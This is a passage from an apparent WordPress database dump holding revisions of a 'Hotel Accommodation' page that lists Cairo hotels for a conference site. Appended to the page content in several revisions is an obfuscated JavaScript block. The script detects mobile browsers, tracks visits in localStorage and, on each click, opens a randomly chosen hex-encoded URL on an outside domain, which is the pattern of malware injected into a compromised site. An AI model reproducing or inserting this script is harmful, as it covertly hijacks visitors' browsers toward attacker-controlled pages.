a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-01-25 07:07:42','2023-01-25 07:07:42','',2685,'https://gsw2023.com/?p=3650',0,'revision','',0),
(3651,1,'2023-01-25 07:08:35','2023-01-25 07:08:35','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Hotel Accommodation</a></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\" INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\" INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p>&nbsp;</p>\n<p><a href=\"https://www.google.com/maps/d/viewer?mid=1E0n62HNPy-cAveLsz0poW4B2c5o&amp;hl=en&amp;ll=30.04291599999999%2C31.23232800000001&amp;z=17\">https://www.google.com/maps/d/viewer?mid=1E0n62HNPy-cAveLsz0poW4B2c5o&amp;hl=en&amp;ll=30.04291599999999%2C31.23232800000001&amp;z=17</a>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-01-25 07:08:35','2023-01-25 07:08:35','',2685,'https://gsw2023.com/?p=3651',0,'revision','',0),
(3652,1,'2023-01-25 07:10:13','2023-01-25 07:10:13','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Hotel Accommodation</a></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\" INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\" INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p>&nbsp;</p>\n<p><a href=\"https://www.google.com/maps/d/viewer?mid=1E0n62HNPy-cAveLsz0poW4B2c5o&amp;hl=en&amp;ll=30.04291599999999%2C31.23232800000001&amp;z=17\" target=\"_blank\" rel=\"noopener\">https://www.google.com/maps/d/viewer?mid=1E0n62HNPy-cAveLsz0poW4B2c5o&amp;hl=en&amp;ll=30.04291599999999%2C31.23232800000001&amp;z=17</a>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" 